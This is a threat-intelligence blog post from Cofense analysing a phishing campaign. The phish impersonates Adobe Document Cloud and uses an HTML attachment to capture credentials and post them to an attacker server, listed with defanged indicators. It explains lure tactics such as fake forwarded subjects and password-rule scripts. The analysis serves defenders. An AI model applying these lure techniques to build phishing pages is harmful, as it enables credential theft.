Share:

By Zachary Bailey, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has seen the rise of threat actors impersonating common document-sharing services to harvest credentials. These attacks can also use legitimate services to host malicious documents that are delivered to an unsuspecting employee who trusts the domain where they are hosted 

Some of these attacks do not need to spoof the sender, such as this Adobe phish (Figure 1) that was found in a Proofpoint environment. The email appears merely to include a purchase order with encryption via the Adobe Document Cloud. In the email, Adobe is just one of several components of the phish. It builds credibility by posing as a government agency and suggests that the recipient can sign into Adobe to decrypt the file – or download Acrobat Reader to view it instead.

Figure 1: Email Body 

This email appears to be a forwarded message, as though the recipient is expecting it – FW: Purchase Order 3500250780 as the subject, which also includes the name of the organization sending the PO. A common tactic used by threat actors is to create a fake reply chain by inserting “RE” or “FW” into the subject line to trick the recipient into thinking it is a response to a conversation they initiated or were involved in.  

Even though the address is clearly from a Gmail domain, it is not an uncommon practice for work-related emails to be shared between personal and corporate accounts.  

The email is rather informativelisting the correct postal address and contact information for the government office it is impersonating. As mentioned earlier, the email body says, “To read it you sign into Adobe Document Cloud or download the latest Adobe Acrobat Reader.” Recipients are not urged to sign in but are presented an alternative option that would not put their credentials at risk. The only urgency is regarding “with immediate effect please ensure all invoices are addressed as below”, but that is legitimate information regarding how to address the invoice.   

If the recipient chooses to sign into the Adobe Document Cloud, they will immediately open the document which then launches in their default web browser. This HTML file will pull its resources from Adobe’s website while the pop-up message in Figure 2 delays the victim from seeing the page. JavaScript is embedded in the page to enforce basic password guidelines, which increases the odds that a realistic password is entered into the form. After the user attempts to log on, the HTML file will also send out a POST request with their login information to the threat actor.

Figure 2: Step 1 of Attack 

When the document is inspected by the recipient, its contents are not immediately known. A popup message will cover up the assets being loaded in, which will be read before proceeding. This is not hosted on a website, so checking the URL will not immediately tip off users that something is amiss. To them, they are just viewing a file on their computer. The wording of the popup is “This document is electronically encrypted to the receiver’s email”, which is a strange way of saying that the document can only be unlocked by the recipient. If a user is not familiar with technical terms, it could still sound legitimate to them, but that should be the first hint something is amiss. The second part of the popup urges them to sign in with “authenticated email credentials”, an even more noticeable tip off that this form wants their login information.  

Figure 3: Step 2 of Attack 

After the user clicks through to access the login page, a full webpage appears that looks like the Adobe Document Cloud site. This is still occurring inside of the downloaded document, and the only way to analyze where the form is from – without pressing “sign in” – is to inspect the code itself. To verify where the login information is going, we pulled up the network traffic and sent a request through. Our information is now going to “infiniteworks[.]net/IDI/high.php”, which is not a part of Adobe.  

Figure 4: Final Redirect of Phish  

After exposing their Adobe account credentials to the attacker, the victim is redirected to a new webpage. If they check the URL again, they will discover that they are now in the actual Adobe website. With no new document being unencrypted, they should be fully aware that something is wrong. They should alert their security team immediately 

Indicators of Compromise 

Network IOC   IP   
hXXps://infiniteworks[.]net/IDI/high.php  70[.]40[.]220[.]123 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.